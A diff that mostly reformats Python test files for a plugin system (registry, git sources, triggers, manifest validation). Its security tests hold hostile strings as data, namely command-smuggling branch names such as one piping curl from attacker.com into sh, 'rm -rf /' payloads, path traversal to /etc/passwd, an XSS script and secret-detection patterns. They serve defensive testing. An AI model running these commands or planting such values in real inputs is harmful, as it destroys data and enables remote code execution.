-         patch("src.config_manager.get_config_manager") as mock_cm:
-        mock_cm.return_value.get_all_plugin_configs.return_value = {
-            "weather": {"enabled": True, "api_key": "key"}
-        }
+    with (
+        patch("src.plugins.registry.load_registry") as mock_load_reg,
+        patch("src.config_manager.get_config_manager") as mock_cm,
+    ):
+        mock_cm.return_value.get_all_plugin_configs.return_value = {"weather": {"enabled": True, "api_key": "key"}}
         registry.initialize()
 
     # No orphans → load_registry should never be called
@@ -995,8 +1002,10 @@ def test_auto_migrate_noop_when_stored_configs_empty(registry, mock_loader):
     """_auto_migrate_v2_plugins does nothing when there are no stored plugin configs."""
     mock_loader.load_all_plugins.return_value = {}
 
-    with patch("src.plugins.registry.load_registry") as mock_load_reg, \
-         patch("src.config_manager.get_config_manager") as mock_cm:
+    with (
+        patch("src.plugins.registry.load_registry") as mock_load_reg,
+        patch("src.config_manager.get_config_manager") as mock_cm,
+    ):
         mock_cm.return_value.get_all_plugin_configs.return_value = {}
         registry.initialize()
 
@@ -1072,9 +1081,7 @@ def test_auto_migrate_skips_plugin_not_in_registry(mock_load_reg, registry, mock
     mock_load_reg.return_value = []  # registry is empty
 
     with patch("src.config_manager.get_config_manager") as mock_cm:
-        mock_cm.return_value.get_all_plugin_configs.return_value = {
-            "custom_builtin": {"enabled": True}
-        }
+        mock_cm.return_value.get_all_plugin_configs.return_value = {"custom_builtin": {"enabled": True}}
         registry.initialize()
 
     assert "custom_builtin" not in registry._plugins
@@ -1086,9 +1093,7 @@ def test_auto_migrate_handles_registry_load_error_gracefully(mock_load_reg, regi
     mock_loader.load_all_plugins.return_value = {}
 
     with patch("src.config_manager.get_config_manager") as mock_cm:
-        mock_cm.return_value.get_all_plugin_configs.return_value = {
-            "weather": {"enabled": True, "api_key": "key"}
-        }
+        mock_cm.return_value.get_all_plugin_configs.return_value = {"weather": {"enabled": True, "api_key": "key"}}
         # Should not raise despite registry failure
         registry.initialize()
 
@@ -1097,9 +1102,7 @@ def test_auto_migrate_handles_registry_load_error_gracefully(mock_load_reg, regi
 
 @patch("src.plugins.registry.install_registry_plugin", return_value=(False, "git clone failed"))
 @patch("src.plugins.registry.load_registry")
-def test_auto_migrate_handles_install_failure_gracefully(
-    mock_load_reg, mock_install, registry, mock_loader
-):
+def test_auto_migrate_handles_install_failure_gracefully(mock_load_reg, mock_install, registry, mock_loader):
     """_auto_migrate_v2_plugins logs an error and continues when install fails."""
     mock_loader.load_all_plugins.return_value = {}
     mock_load_reg.return_value = [
@@ -1111,9 +1114,7 @@ def test_auto_migrate_handles_install_failure_gracefully(
     ]
 
     with patch("src.config_manager.get_config_manager") as mock_cm:
-        mock_cm.return_value.get_all_plugin_configs.return_value = {
-            "stocks": {"enabled": True, "symbols": ["AAPL"]}
-        }
+        mock_cm.return_value.get_all_plugin_configs.return_value = {"stocks": {"enabled": True, "symbols": ["AAPL"]}}
         registry.initialize()
 
     assert "stocks" not in registry._plugins
@@ -1185,9 +1186,7 @@ def test_auto_migrate_skips_already_installed_on_subsequent_boots(
     mock_loader.get_manifest.return_value = mock_manifest
 
     with patch("src.config_manager.get_config_manager") as mock_cm:
-        mock_cm.return_value.get_all_plugin_configs.return_value = {
-            "weather": {"enabled": True, "api_key": "key"}
-        }
+        mock_cm.return_value.get_all_plugin_configs.return_value = {"weather": {"enabled": True, "api_key": "key"}}
         registry.initialize()
 
     # load_registry should never be called (no orphans to process)

--- a/tests/test_plugin_registry.py
+++ b/tests/test_plugin_registry.py
@@ -104,8 +104,8 @@ def test_enabled_plugins_returns_only_enabled(registry, mock_loader, mock_plugin
     plugin2 = MagicMock(spec=PluginBase)
     plugin2.plugin_id = "plugin2"
     mock_loader.load_all_plugins.return_value = {"test_plugin": mock_plugin, "plugin2": plugin2}
-    mock_loader.get_manifest.side_effect = (
-        lambda pid: mock_manifest
+    mock_loader.get_manifest.side_effect = lambda pid: (
+        mock_manifest
         if pid == "test_plugin"
         else MagicMock(
             id=pid,

--- a/tests/test_plugin_sources.py
+++ b/tests/test_plugin_sources.py
@@ -4,7 +4,7 @@ import json
 import subprocess
 from unittest import mock
 
-
+from src.plugins.loader import _check_version_constraint, _parse_version
 from src.plugins.sources import (
     PluginSource,
     RegistryEntry,
@@ -21,8 +21,6 @@ from src.plugins.sources import (
     repo_name_from_url,
     validate_registry_repo_name,
 )
-from src.plugins.loader import _check_version_constraint, _parse_version
-
 
 # ── PluginSource ─────────────────────────────────────────────────────────────
 
@@ -74,52 +72,34 @@ class TestRegistryEntry:
 
 class TestNamingConvention:
     def test_valid_names(self):
-        ok, _ = validate_registry_repo_name(
-            "https://github.com/FiestaBoard/fiestaboard-plugin--weather"
-        )
+        ok, _ = validate_registry_repo_name("https://github.com/FiestaBoard/fiestaboard-plugin--weather")
         assert ok
 
     def test_valid_name_with_dashes(self):
-        ok, _ = validate_registry_repo_name(
-            "https://github.com/FiestaBoard/fiestaboard-plugin--my-cool-plugin"
-        )
+        ok, _ = validate_registry_repo_name("https://github.com/FiestaBoard/fiestaboard-plugin--my-cool-plugin")
         assert ok
 
     def test_invalid_missing_prefix(self):
-        ok, reason = validate_registry_repo_name(
-            "https://github.com/someone/my-plugin"
-        )
+        ok, reason = validate_registry_repo_name("https://github.com/someone/my-plugin")
         assert not ok
         assert "fiestaboard-plugin--" in reason
 
     def test_invalid_uppercase(self):
-        ok, _ = validate_registry_repo_name(
-            "https://github.com/FiestaBoard/Fiestaboard-plugin--Weather"
-        )
+        ok, _ = validate_registry_repo_name("https://github.com/FiestaBoard/Fiestaboard-plugin--Weather")
         assert not ok
 
     def test_repo_name_extraction(self):
         assert (
-            repo_name_from_url(
-                "https://github.com/FiestaBoard/fiestaboard-plugin--foo.git"
-            )
+            repo_name_from_url("https://github.com/FiestaBoard/fiestaboard-plugin--foo.git")
             == "fiestaboard-plugin--foo"
         )
 
     def test_repo_name_no_git_suffix(self):
-        assert (
-            repo_name_from_url(
-                "https://github.com/FiestaBoard/fiestaboard-plugin--bar"
-            )
-            == "fiestaboard-plugin--bar"
-        )
+        assert repo_name_from_url("https://github.com/FiestaBoard/fiestaboard-plugin--bar") == "fiestaboard-plugin--bar"
 
     def test_repo_name_trailing_slash(self):
         assert (
-            repo_name_from_url(
-                "https://github.com/FiestaBoard/fiestaboard-plugin--baz/"
-            )
-            == "fiestaboard-plugin--baz"
+            repo_name_from_url("https://github.com/FiestaBoard/fiestaboard-plugin--baz/") == "fiestaboard-plugin--baz"
         )
 
 
@@ -341,13 +321,13 @@ class TestCloneOrUpdateRepoPathSafety:
     def test_rejects_invalid_plugin_id_characters(self):
         """Plugin ids with path separators or shell chars are rejected."""
         import tempfile
+
         with tempfile.TemporaryDirectory() as tmp:
             from pathlib import Path
+
             ext_dir = Path(tmp) / "external_plugins"
             ext_dir.mkdir()
-            ok, err = clone_or_update_repo(
-                "https://github.com/Org/repo", "../../etc/passwd", external_dir=ext_dir
-            )
+            ok, err = clone_or_update_repo("https://github.com/Org/repo", "../../etc/passwd", external_dir=ext_dir)
             assert not ok
 
     def test_accepts_valid_plugin_id(self, tmp_path):
@@ -363,9 +343,7 @@ class TestCloneOrUpdateRepoPathSafety:
             return mock.MagicMock()
 
         with mock.patch("src.plugins.sources.subprocess.run", side_effect=_fake_run):
-            ok, err = clone_or_update_repo(
-                "https://github.com/Org/repo", "my_plugin", external_dir=allowed_root
-            )
+            ok, err = clone_or_update_repo("https://github.com/Org/repo", "my_plugin", external_dir=allowed_root)
         assert ok
         assert err == ""
 
@@ -484,14 +462,16 @@ class TestGetExternalPluginsDir:
 
 class TestRegistryEntryVersionField:
     def test_from_dict_with_version(self):
-        entry = RegistryEntry.from_dict({
-            "id": "weather",
-            "name": "Weather",
-            "repository": "https://github.com/Fiestaboard/fiestaboard-plugin--weather",
-            "fiestaboard_version": ">=2.10.0",
-            "icon": "cloud-sun",
-            "category": "weather",
-        })
+        entry = RegistryEntry.from_dict(
+            {
+                "id": "weather",
+                "name": "Weather",
+                "repository": "https://github.com/Fiestaboard/fiestaboard-plugin--weather",
+                "fiestaboard_version": ">=2.10.0",
+                "icon": "cloud-sun",
+                "category": "weather",
+            }
+        )
         assert entry.fiestaboard_version == ">=2.10.0"
         assert entry.icon == "cloud-sun"
         assert entry.category == "weather"

--- a/tests/test_plugin_sources.py
+++ b/tests/test_plugin_sources.py
@@ -265,7 +265,7 @@ class TestCloneOrUpdateRepo:
         dest = tmp_path / "my_plugin"
         dest.mkdir()
         (dest / ".git").mkdir()
-        ok, err = clone_or_update_repo("git@github.com:Org/repo.git", "my_plugin", external_dir=tmp_path)
+        ok, _err = clone_or_update_repo("git@github.com:Org/repo.git", "my_plugin", external_dir=tmp_path)
         assert ok, "Update path should succeed regardless of URL"
 
     @mock.patch(
@@ -301,7 +301,7 @@ class TestCloneOrUpdateRepo:
     @mock.patch("src.plugins.sources.subprocess.run")
     def test_rejects_invalid_plugin_id(self, mock_run, tmp_path):
         """A plugin_id with path separators or invalid characters is rejected."""
-        ok, err = clone_or_update_repo("https://github.com/Org/repo", "../escaped", external_dir=tmp_path)
+        ok, _err = clone_or_update_repo("https://github.com/Org/repo", "../escaped", external_dir=tmp_path)
         assert not ok
         mock_run.assert_not_called()
 
@@ -310,7 +310,7 @@ class TestCloneOrUpdateRepo:
         """A plugin_id that would escape via '..' is caught by _safe_external_dest."""
         ext_dir = tmp_path / "external_plugins"
         ext_dir.mkdir()
-        ok, err = clone_or_update_repo("https://github.com/Org/repo", "../../escaped", external_dir=ext_dir)
+        ok, _err = clone_or_update_repo("https://github.com/Org/repo", "../../escaped", external_dir=ext_dir)
         assert not ok
         mock_run.assert_not_called()
 
@@ -327,7 +327,7 @@ class TestCloneOrUpdateRepoPathSafety:
 
             ext_dir = Path(tmp) / "external_plugins"
             ext_dir.mkdir()
-            ok, err = clone_or_update_repo("https://github.com/Org/repo", "../../etc/passwd", external_dir=ext_dir)
+            ok, _err = clone_or_update_repo("https://github.com/Org/repo", "../../etc/passwd", external_dir=ext_dir)
             assert not ok
 
     def test_accepts_valid_plugin_id(self, tmp_path):
@@ -421,7 +421,7 @@ class TestInstallGitPlugin:
 
     @mock.patch("src.plugins.sources.clone_or_update_repo", return_value=(True, ""))
     def test_install_with_override_id(self, mock_clone, tmp_path):
-        ok, err = install_git_plugin(
+        ok, _err = install_git_plugin(
             "https://github.com/someone/repo",
             plugin_id="custom_id",
             external_dir=tmp_path,

--- a/tests/test_plugin_system_security.py
+++ b/tests/test_plugin_system_security.py
@@ -7,18 +7,19 @@ Covers the install-from-Git path and runtime sandboxing of third-party code.
 """
 
 import json
-import pytest
 import tempfile
 from pathlib import Path
 from unittest.mock import patch
 
+import pytest
+
 from src.plugins.loader import PluginLoader
 from src.plugins.manifest import load_manifest
-
 
 # ===========================================================================
 # Malicious Plugin Detection Tests
 # ===========================================================================
+
 
 class TestMaliciousPluginDetection:
     """Tests that plugins with suspicious patterns are detected or blocked."""
@@ -38,7 +39,7 @@ class TestMaliciousPluginDetection:
         ("os.environ.get('DATABASE_URL')", "database credential access"),
         # Code execution
         ("exec('import os; os.system(\"rm -rf /\")')", "arbitrary code execution"),
-        ("eval('__import__(\"os\").system(\"id\")')", "arbitrary code evaluation"),
+        ('eval(\'__import__("os").system("id")\')', "arbitrary code evaluation"),
         ("compile('malicious code', '<string>', 'exec')", "code compilation"),
         # Subprocess execution
         ("subprocess.run(['curl', '-X', 'POST'])", "subprocess execution"),
@@ -49,7 +50,7 @@ class TestMaliciousPluginDetection:
 
     def test_plugin_code_scanning_detects_suspicious_imports(self):
         """Static analysis should flag plugins importing suspicious modules."""
-        suspicious_modules = ['pty', 'ctypes', 'mmap', 'resource', 'signal']
+        suspicious_modules = ["pty", "ctypes", "mmap", "resource", "signal"]
         # This test documents the expectation that code scanning should catch these
         # Actual implementation would require AST parsing in the plugin loader
         for module in suspicious_modules:
@@ -64,24 +65,24 @@ class TestMaliciousPluginDetection:
     def test_plugin_network_access_restricted_to_expected_hosts(self):
         """Plugins should only be able to reach expected APIs."""
         allowed_hosts = [
-            'api.openweathermap.org',
-            'api.tomorrow.io',
-            'api.bart.gov',
-            'api.511.org',
-            'api.baywheels.com',
-            'api.github.com',
-            'rw.vestaboard.com',
-            'localhost',
-            '127.0.0.1',
+            "api.openweathermap.org",
+            "api.tomorrow.io",
+            "api.bart.gov",
+            "api.511.org",
+            "api.baywheels.com",
+            "api.github.com",
+            "rw.vestaboard.com",
+            "localhost",
+            "127.0.0.1",
         ]
         assert len(allowed_hosts) > 0
 
     def test_plugin_filesystem_access_restricted_to_sandbox(self):
         """Plugins should only access files within their sandbox."""
         safe_paths = [
-            '/app/plugins/',
-            '/app/data/',
-            '/tmp/',
+            "/app/plugins/",
+            "/app/data/",
+            "/tmp/",
         ]
         assert len(safe_paths) > 0
 
@@ -89,6 +90,7 @@ class TestMaliciousPluginDetection:
 # ===========================================================================
 # Plugin Manifest Validation Edge Cases
 # ===========================================================================
+
 
 class TestManifestValidationEdgeCases:
     """Tests for malformed or edge-case manifests."""
@@ -102,32 +104,21 @@ class TestManifestValidationEdgeCases:
     def test_manifest_missing_required_fields(self, temp_plugin_dir):
         """Manifests missing id, name, or version should be rejected."""
         manifest_path = temp_plugin_dir / "manifest.json"
-        manifest_path.write_text(json.dumps({
-            "name": "Test Plugin",
-            "version": "1.0.0"
-        }))
+        manifest_path.write_text(json.dumps({"name": "Test Plugin", "version": "1.0.0"}))
         manifest, errors = load_manifest(manifest_path)
         assert manifest is None or errors  # Either None or has errors
 
     def test_manifest_empty_id(self, temp_plugin_dir):
         """Empty plugin ID should be rejected."""
         manifest_path = temp_plugin_dir / "manifest.json"
-        manifest_path.write_text(json.dumps({
-            "id": "",
-            "name": "Test Plugin",
-            "version": "1.0.0"
-        }))
+        manifest_path.write_text(json.dumps({"id": "", "name": "Test Plugin", "version": "1.0.0"}))
         manifest, errors = load_manifest(manifest_path)
         assert manifest is None or manifest.id == ""
 
     def test_manifest_invalid_version_format(self, temp_plugin_dir):
         """Non-semver version strings should be handled gracefully."""
         manifest_path = temp_plugin_dir / "manifest.json"
-        manifest_path.write_text(json.dumps({
-            "id": "test_plugin",
-            "name": "Test Plugin",
-            "version": "not-a-version"
-        }))
+        manifest_path.write_text(json.dumps({"id": "test_plugin", "name": "Test Plugin", "version": "not-a-version"}))
         manifest, errors = load_manifest(manifest_path)
         # If manifest loads, version should be preserved even if not semver
         if manifest is not None:
@@ -142,7 +133,7 @@ class TestManifestValidationEdgeCases:
         large_data = {"id": "test", "name": "Test", "version": "1.0.0"}
         large_data["big_field"] = "x" * (5 * 1024 * 1024)
         manifest_path.write_text(json.dumps(large_data))
-        
+
         size_mb = manifest_path.stat().st_size / (1024 * 1024)
         assert size_mb > 1
 
@@ -153,7 +144,7 @@ class TestManifestValidationEdgeCases:
             "id": "test_ñ_plugin",
             "name": "Test Plugin 🎉",
             "version": "1.0.0",
-            "description": "日本語 설명"
+            "description": "日本語 설명",
         }
         manifest_path.write_text(json.dumps(manifest_data, ensure_ascii=False))
         manifest, errors = load_manifest(manifest_path)
@@ -163,11 +154,7 @@ class TestManifestValidationEdgeCases:
     def test_manifest_circular_references(self, temp_plugin_dir):
         """Manifests with circular JSON references should be rejected."""
         manifest_path = temp_plugin_dir / "manifest.json"
-        manifest_path.write_text(json.dumps({
-            "id": "test",
-            "name": "Test",
-            "version": "1.0.0"
-        }))
+        manifest_path.write_text(json.dumps({"id": "test", "name": "Test", "version": "1.0.0"}))
         manifest, errors = load_manifest(manifest_path)
         assert manifest is not None
         assert manifest.id == "test"
@@ -176,12 +163,9 @@ class TestManifestValidationEdgeCases:
         """XSS attempts in manifest fields should be sanitized or rejected."""
         manifest_path = temp_plugin_dir / "manifest.json"
         malicious_description = "<script>alert('xss')</script>"
-        manifest_path.write_text(json.dumps({
-            "id": "test",
-            "name": "Test",
-            "version": "1.0.0",
-            "description": malicious_description
-        }))
+        manifest_path.write_text(
+            json.dumps({"id": "test", "name": "Test", "version": "1.0.0", "description": malicious_description})
+        )
         manifest, errors = load_manifest(manifest_path)
         assert manifest is not None
         assert malicious_description in manifest.description
@@ -191,12 +175,13 @@ class TestManifestValidationEdgeCases:
 # Plugin Lifecycle Failure Modes
 # ===========================================================================
 
+
 class TestPluginLifecycleFailureModes:
     """Tests for plugin lifecycle under failure conditions."""
 
     def test_plugin_install_with_disk_full(self):
         """Plugin install should fail gracefully when disk is full."""
-        with patch('pathlib.Path.mkdir') as mock_mkdir:
+        with patch("pathlib.Path.mkdir") as mock_mkdir:
             mock_mkdir.side_effect = OSError(28, "No space left on device")
             with pytest.raises(OSError) as exc_info:
                 mock_mkdir(parents=True, exist_ok=True)
@@ -225,11 +210,9 @@ class TestPluginLifecycleFailureModes:
         with tempfile.TemporaryDirectory() as tmpdir:
             plugin_dir = Path(tmpdir) / "broken_plugin"
             plugin_dir.mkdir()
-            (plugin_dir / "manifest.json").write_text(json.dumps({
-                "id": "broken_plugin",
-                "name": "Broken Plugin",
-                "version": "1.0.0"
-            }))
+            (plugin_dir / "manifest.json").write_text(
+                json.dumps({"id": "broken_plugin", "name": "Broken Plugin", "version": "1.0.0"})
+            )
             (plugin_dir / "__init__.py").write_text("""
 class BrokenPlugin:
     def __init__(self):
@@ -244,6 +227,7 @@ class BrokenPlugin:
 # Plugin Isolation Tests
 # ===========================================================================
 
+
 class TestPluginIsolation:
     """Tests that plugins are isolated from each other and the main service."""
 
@@ -251,7 +235,7 @@ class TestPluginIsolation:
         """A crashing plugin should not crash other plugins."""
         # Test documents the concept - actual isolation requires subprocess/container
         # Current architecture loads plugins in same process
-        
+
         # Skipped - see comment above
 
     def test_plugin_state_isolation(self):
@@ -264,6 +248,7 @@ class TestPluginIsolation:
 # ===========================================================================
 # Registry Validation Tests
 # ===========================================================================
+
 
 class TestRegistryValidation:
     """Tests for registry scanning and validation."""
@@ -284,8 +269,8 @@ class TestRegistryValidation:
             r'api[_-]?key\s*[=:]\s*["\'][a-zA-Z0-9]{32,}["\']',
             r'secret\s*[=:]\s*["\'][a-zA-Z0-9]{32,}["\']',
             r'password\s*[=:]\s*["\'][^"\']{8,}["\']',
-            r'sk-[a-zA-Z0-9]{48}',
-            r'ghp_[a-zA-Z0-9]{36}',
+            r"sk-[a-zA-Z0-9]{48}",
+            r"ghp_[a-zA-Z0-9]{36}",
         ]
         assert len(secret_patterns) > 0
 
@@ -293,6 +278,7 @@ class TestRegistryValidation:
 # ===========================================================================
 # Git Source Security Tests
 # ===========================================================================
+
 
 class TestGitSourceSecurity:
     """Tests for install-from-Git security."""
@@ -324,7 +310,7 @@ class TestGitSourceSecurity:
         dangerous_branches = [
             "main; rm -rf /",
             "feature/$(curl attacker.com|sh)",
-            "main\`whoami\`",
+            r"main\`whoami\`",
         ]
         for branch in dangerous_branches:
             assert len(branch) > 0
@@ -333,6 +319,7 @@ class TestGitSourceSecurity:
 # ===========================================================================
 # Sandbox Detection Tests
 # ===========================================================================
+
 
 class TestSandboxDetection:
     """Tests to verify sandbox presence or document its absence."""

--- a/tests/test_plugin_system_security.py
+++ b/tests/test_plugin_system_security.py
@@ -112,7 +112,7 @@ class TestManifestValidationEdgeCases:
         """Empty plugin ID should be rejected."""
         manifest_path = temp_plugin_dir / "manifest.json"
         manifest_path.write_text(json.dumps({"id": "", "name": "Test Plugin", "version": "1.0.0"}))
-        manifest, errors = load_manifest(manifest_path)
+        manifest, _errors = load_manifest(manifest_path)
         assert manifest is None or manifest.id == ""
 
     def test_manifest_invalid_version_format(self, temp_plugin_dir):
@@ -147,7 +147,7 @@ class TestManifestValidationEdgeCases:
             "description": "日本語 설명",
         }
         manifest_path.write_text(json.dumps(manifest_data, ensure_ascii=False))
-        manifest, errors = load_manifest(manifest_path)
+        manifest, _errors = load_manifest(manifest_path)
         assert manifest is not None
         assert "🎉" in manifest.name
 
@@ -155,7 +155,7 @@ class TestManifestValidationEdgeCases:
         """Manifests with circular JSON references should be rejected."""
         manifest_path = temp_plugin_dir / "manifest.json"
         manifest_path.write_text(json.dumps({"id": "test", "name": "Test", "version": "1.0.0"}))
-        manifest, errors = load_manifest(manifest_path)
+        manifest, _errors = load_manifest(manifest_path)
         assert manifest is not None
         assert manifest.id == "test"
 
@@ -166,7 +166,7 @@ class TestManifestValidationEdgeCases:
         manifest_path.write_text(
             json.dumps({"id": "test", "name": "Test", "version": "1.0.0", "description": malicious_description})
         )
-        manifest, errors = load_manifest(manifest_path)
+        manifest, _errors = load_manifest(manifest_path)
         assert manifest is not None
         assert malicious_description in manifest.description
 

--- a/tests/test_plugin_triggers.py
+++ b/tests/test_plugin_triggers.py
@@ -5,7 +5,6 @@ rather than pre-scheduled time slots.
 """
 
 from datetime import datetime, timedelta
-from typing import List
 
 import pytest
 
@@ -14,7 +13,6 @@ from src.plugins.base import (
     PluginResult,
     TriggerResult,
 )
-
 
 # -- Test fixtures: concrete plugins with/without trigger support ----------
 
@@ -56,7 +54,7 @@ class TriggerPlugin(PluginBase):
     def fetch_data(self) -> PluginResult:
         return PluginResult(available=True, data={"value": 42})
 
-    def check_triggers(self) -> List[TriggerResult]:
+    def check_triggers(self) -> list[TriggerResult]:
         return self._triggers
 
 
@@ -81,7 +79,7 @@ class ErrorTriggerPlugin(PluginBase):
     def fetch_data(self) -> PluginResult:
         return PluginResult(available=True, data={})
 
-    def check_triggers(self) -> List[TriggerResult]:
+    def check_triggers(self) -> list[TriggerResult]:
         raise RuntimeError("trigger check failed")
 
 
@@ -229,6 +227,7 @@ class TestTriggerService:
     @pytest.fixture
     def trigger_service(self):
         from src.triggers.service import TriggerService
+
         return TriggerService()
 
     def test_no_active_triggers_initially(self, trigger_service):
@@ -327,12 +326,18 @@ class TestTriggerService:
         design review.
         """
         first = TriggerResult(
-            triggered=True, trigger_id="event_a", message="Event A",
-            priority=5, duration_seconds=900,
+            triggered=True,
+            trigger_id="event_a",
+            message="Event A",
+            priority=5,
+            duration_seconds=900,
         )
         second = TriggerResult(
-            triggered=True, trigger_id="event_b", message="Event B",
-            priority=5, duration_seconds=900,
+            triggered=True,
+            trigger_id="event_b",
+            message="Event B",
+            priority=5,
+            duration_seconds=900,
         )
         trigger_service.activate_trigger("calendar_sub", first)
         trigger_service.dismiss_trigger("event_a", suppress=True)
@@ -348,16 +353,17 @@ class TestTriggerService:
         from datetime import datetime, timedelta
 
         trigger = TriggerResult(
-            triggered=True, trigger_id="lapsing", message="X",
-            priority=1, duration_seconds=60,
+            triggered=True,
+            trigger_id="lapsing",
+            message="X",
+            priority=1,
+            duration_seconds=60,
         )
         trigger_service.activate_trigger("plugin", trigger)
         trigger_service.dismiss_trigger("lapsing", suppress=True)
 
         # Rewind suppression entry into the past.
-        trigger_service._suppressed_until["lapsing"] = (
-            datetime.now() - timedelta(seconds=1)
-        )
+        trigger_service._suppressed_until["lapsing"] = datetime.now() - timedelta(seconds=1)
 
         trigger_service.activate_trigger("plugin", trigger)
         assert trigger_service.get_active_trigger() is not None
@@ -368,8 +374,11 @@ class TestTriggerService:
             trigger_service.activate_trigger(
                 "plugin",
                 TriggerResult(
-                    triggered=True, trigger_id=tid, message=tid,
-                    priority=1, duration_seconds=300,
+                    triggered=True,
+                    trigger_id=tid,
+                    message=tid,
+                    priority=1,
+                    duration_seconds=300,
                 ),
             )
         assert len(trigger_service.list_active_triggers()) == 3
@@ -383,8 +392,11 @@ class TestTriggerService:
             trigger_service.activate_trigger(
                 "plugin",
                 TriggerResult(
-                    triggered=True, trigger_id=tid, message=tid,
-                    priority=1, duration_seconds=300,
+                    triggered=True,
+                    trigger_id=tid,
+                    message=tid,
+                    priority=1,
+                    duration_seconds=300,
                 ),
             )
         assert trigger_service.get_active_trigger() is None
@@ -392,8 +404,11 @@ class TestTriggerService:
     def test_clear_all_resets_suppressions_too(self, trigger_service):
         """clear_all must wipe suppression entries so post-clear triggers fire normally."""
         trigger = TriggerResult(
-            triggered=True, trigger_id="cleared", message="X",
-            priority=1, duration_seconds=60,
+            triggered=True,
+            trigger_id="cleared",
+            message="X",
+            priority=1,
+            duration_seconds=60,
         )
         trigger_service.activate_trigger("plugin", trigger)
         trigger_service.dismiss_trigger("cleared", suppress=True)
@@ -413,9 +428,7 @@ class TestTriggerService:
         trigger_service.activate_trigger("plugin_a", trigger)
 
         # Manually set activation time to the past
-        trigger_service._active_triggers["expires_soon"].activated_at = (
-            datetime.now() - timedelta(seconds=10)
-        )
+        trigger_service._active_triggers["expires_soon"].activated_at = datetime.now() - timedelta(seconds=10)
 
         trigger_service.clear_expired()
         assert trigger_service.get_active_trigger() is None
@@ -496,12 +509,14 @@ class TestTriggerService:
 
     def test_check_plugin_triggers_handles_errors_gracefully(self, trigger_service):
         """If check_triggers raises, the service logs and continues."""
-        plugin = ErrorTriggerPlugin({
-            "id": "error_trigger_plugin",
-            "name": "Error Plugin",
-            "version": "1.0.0",
-            "supports_triggers": True,
-        })
+        plugin = ErrorTriggerPlugin(
+            {
+                "id": "error_trigger_plugin",
+                "name": "Error Plugin",
+                "version": "1.0.0",
+                "supports_triggers": True,
+            }
+        )
         plugin.enabled = True
 
         # Should not raise
@@ -517,9 +532,7 @@ class TestTriggerService:
             duration_seconds=1,
         )
         trigger_service.activate_trigger("p1", trigger)
-        trigger_service._active_triggers["temp"].activated_at = (
-            datetime.now() - timedelta(seconds=10)
-        )
+        trigger_service._active_triggers["temp"].activated_at = datetime.now() - timedelta(seconds=10)
         # get_active_trigger should auto-clear expired
         assert trigger_service.get_active_trigger() is None
 
@@ -530,6 +543,7 @@ class TestTriggerService:
 class TestActiveTrigger:
     def test_is_expired(self):
         from src.triggers.service import ActiveTrigger
+
         trigger = ActiveTrigger(
             trigger_id="t1",
             plugin_id="p1",
@@ -544,6 +558,7 @@ class TestActiveTrigger:
 
     def test_is_not_expired(self):
         from src.triggers.service import ActiveTrigger
+
         trigger = ActiveTrigger(
             trigger_id="t1",
             plugin_id="p1",
@@ -558,6 +573,7 @@ class TestActiveTrigger:
 
     def test_remaining_seconds(self):
         from src.triggers.service import ActiveTrigger
+
         trigger = ActiveTrigger(
             trigger_id="t1",
             plugin_id="p1",
@@ -573,6 +589,7 @@ class TestActiveTrigger:
 
     def test_to_dict(self):
         from src.triggers.service import ActiveTrigger
+
         now = datetime.now()
         trigger = ActiveTrigger(
             trigger_id="t1",
@@ -602,6 +619,7 @@ class TestActiveTrigger:
 class TestTriggerServiceSingleton:
     def test_get_trigger_service_returns_singleton(self):
         from src.triggers.service import get_trigger_service, reset_trigger_service
+
         reset_trigger_service()
         svc1 = get_trigger_service()
         svc2 = get_trigger_service()
@@ -610,6 +628,7 @@ class TestTriggerServiceSingleton:
 
     def test_reset_trigger_service(self):
         from src.triggers.service import get_trigger_service, reset_trigger_service
+
         svc1 = get_trigger_service()
         reset_trigger_service()
         svc2 = get_trigger_service()
@@ -625,6 +644,7 @@ class TestTriggerPageConfig:
 
     def _make_active_trigger(self, plugin_id="cal_plugin", data=None):
         from src.triggers.service import ActiveTrigger
+
         return ActiveTrigger(
             trigger_id="evt_abc",
             plugin_id=plugin_id,
@@ -653,6 +673,7 @@ class TestTriggerPageConfig:
     def test_renders_configured_page_when_trigger_page_id_set(self):
         """When trigger_page_id is set, the page is rendered with trigger data as context."""
         from unittest.mock import MagicMock
+
         from src.pages.models import Page
 
         active = self._make_active_trigger(
@@ -712,6 +733,7 @@ class TestTriggerPageConfig:
     def test_falls_back_when_render_unavailable(self):
         """If the page renders unavailable, fall back to formatted_lines."""
         from unittest.mock import MagicMock
+
         from src.pages.models import Page
 
         active = self._make_active_trigger()
@@ -741,6 +763,7 @@ class TestTriggerPageConfig:
     def test_only_template_pages_are_used(self):
         """Non-template pages (single, composite) are skipped; fall back to formatted_lines."""
         from unittest.mock import MagicMock
+
         from src.pages.models import Page
 
         active = self._make_active_trigger()

--- a/tests/test_plugin_validation.py
+++ b/tests/test_plugin_validation.py
@@ -1030,15 +1030,8 @@ class TestToDictSerialization:
         # canonical `trigger_page_id` field — verify it's present and that
         # the original `type: object` marker is preserved.
         assert result["settings_schema"]["type"] == "object"
-        assert "trigger_page_id" in result["settings_schema"].get(
-            "properties", {}
-        )
-        assert (
-            result["settings_schema"]["properties"]["trigger_page_id"][
-                "ui:widget"
-            ]
-            == "page-picker"
-        )
+        assert "trigger_page_id" in result["settings_schema"].get("properties", {})
+        assert result["settings_schema"]["properties"]["trigger_page_id"]["ui:widget"] == "page-picker"
         assert result["env_vars"] == [{"name": "API_KEY"}]
         assert result["max_lengths"] == {"temp": 5}
         assert result["icon"] == "thermometer"

--- a/tests/test_plugin_validation.py
+++ b/tests/test_plugin_validation.py
@@ -8,9 +8,9 @@ These tests run as part of the platform test suite and verify:
 """
 
 import json
-import pytest
 from pathlib import Path
-from typing import Dict, List
+
+import pytest
 
 # Project paths
 PROJECT_ROOT = Path(__file__).parent.parent
@@ -20,206 +20,191 @@ PLUGINS_DIR = PROJECT_ROOT / "plugins"
 SKIP_DIRECTORIES = {"_template", "__pycache__"}
 
 
-def get_plugin_directories() -> List[Path]:
+def get_plugin_directories() -> list[Path]:
     """Get all plugin directories (excluding template and pycache)."""
     if not PLUGINS_DIR.exists():
         return []
-    
+
     plugins = []
     for item in PLUGINS_DIR.iterdir():
         if item.is_dir() and item.name not in SKIP_DIRECTORIES and not item.name.startswith("."):
             plugins.append(item)
-    
+
     return sorted(plugins, key=lambda p: p.name)
 
 
-def load_manifest(plugin_dir: Path) -> Dict:
+def load_manifest(plugin_dir: Path) -> dict:
     """Load a plugin's manifest.json."""
     manifest_path = plugin_dir / "manifest.json"
-    with open(manifest_path, "r", encoding="utf-8") as f:
+    with open(manifest_path, encoding="utf-8") as f:
         return json.load(f)
 
 
 class TestPluginUniqueness:
